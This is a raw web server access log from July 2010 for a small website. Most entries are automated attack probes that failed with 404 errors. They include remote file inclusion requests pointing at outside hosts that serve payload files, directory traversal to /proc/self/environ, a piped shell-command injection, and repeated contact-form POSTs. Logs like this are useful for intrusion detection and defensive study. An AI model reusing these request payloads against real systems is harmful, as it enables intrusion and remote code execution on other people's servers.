222.236.47.182 - - [24/Jul/2010:03:05:44 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.236.47.182 - - [24/Jul/2010:03:05:44 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.236.47.182 - - [24/Jul/2010:03:07:31 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:08:45 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:08:45 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:08:45 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:08:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:08:57 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:08:57 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:02 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:09:03 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:03 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:09:04 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:09:04 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:08 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:09 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:13 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:09:13 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:09:13 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:14 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:09:15 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:25 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:28 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:33 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:34 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:35 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:36 -0700] "POST /logs/access.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.18.12 - - [24/Jul/2010:03:09:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:11:22 -0700] "GET /logs/access_100709.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:12:15 -0700] "GET /logs/access_100709.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.5.163.203 - - [24/Jul/2010:03:12:16 -0700] "GET /logs/access_100709.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.joodsmaastricht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
213.171.37.206 - - [24/Jul/2010:03:22:17 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
213.171.37.206 - - [24/Jul/2010:03:22:17 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
93.232.214.130 - - [24/Jul/2010:03:22:33 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
93.232.214.130 - - [24/Jul/2010:03:22:33 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
93.232.214.130 - - [24/Jul/2010:03:22:34 -0700] "GET /logs/access_100702.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:23:46 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:23:46 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:23:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:24:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:24:04 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:24:04 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:24:43 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:25:05 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:00 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:05 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:31:10 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:31:10 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:31:10 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:03:31:10 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:14 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:14 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:14 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [24/Jul/2010:03:31:19 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
213.171.37.206 - - [24/Jul/2010:03:32:39 -0700] "GET /logs/access_100618.log//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
195.56.111.226 - - [24/Jul/2010:03:49:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.56.111.226 - - [24/Jul/2010:03:49:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.56.111.226 - - [24/Jul/2010:03:49:17 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:03:59:04 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.allattitudedoxies.com"
93.232.214.130 - - [24/Jul/2010:03:59:39 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
93.232.214.130 - - [24/Jul/2010:03:59:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
93.232.214.130 - - [24/Jul/2010:03:59:40 -0700] "GET /logs/access_100702.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:04:08:37 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:04:08:37 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:04:08:37 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:08:50 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.allattitudedoxies.com"
125.141.91.138 - - [24/Jul/2010:04:13:52 -0700] "GET /logs/access_100702.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
83.16.100.218 - - [24/Jul/2010:04:16:33 -0700] "GET /logs/access_100618.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
83.16.100.218 - - [24/Jul/2010:04:16:33 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
83.16.100.218 - - [24/Jul/2010:04:16:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
195.42.115.65 - - [24/Jul/2010:04:20:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.42.115.65 - - [24/Jul/2010:04:20:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.42.115.65 - - [24/Jul/2010:04:20:53 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.42.115.65 - - [24/Jul/2010:04:20:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.42.115.65 - - [24/Jul/2010:04:20:59 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
195.42.115.65 - - [24/Jul/2010:04:20:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:34:19 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:34:19 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:34:19 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.allattitudedoxies.com"
46.98.70.222 - - [24/Jul/2010:04:35:25 -0700] "GET /logs/access_100618.log HTTP/1.0" 404 - "http://www.allattitudedoxies.com/logs/access_100618.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.allattitudedoxies.com"
46.98.70.222 - - [24/Jul/2010:04:35:25 -0700] "GET / HTTP/1.0" 200 908 "http://www.allattitudedoxies.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.allattitudedoxies.com"
85.236.50.166 - - [24/Jul/2010:04:46:12 -0700] "GET /logs/access_100702.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
85.236.50.166 - - [24/Jul/2010:04:46:12 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
85.236.50.166 - - [24/Jul/2010:04:46:12 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
85.236.50.166 - - [24/Jul/2010:04:46:12 -0700] "GET /logs/access_100702.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
85.236.50.166 - - [24/Jul/2010:04:46:12 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
85.236.50.166 - - [24/Jul/2010:04:46:12 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:51:04 -0700] "GET /errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:51:04 -0700] "GET /logs/access.log/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:51:04 -0700] "GET /logs/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:04:51:11 -0700] "GET /logs/access_100610.log/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
67.218.116.167 - - [24/Jul/2010:05:00:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:05:09:09 -0700] "GET /logs/access.log//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:05:09:09 -0700] "GET /login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.124.198.168 - - [24/Jul/2010:05:09:09 -0700] "GET /logs//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
72.55.153.180 - - [24/Jul/2010:05:09:37 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [24/Jul/2010:05:09:37 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [24/Jul/2010:05:09:38 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
88.198.183.48 - - [24/Jul/2010:05:09:59 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
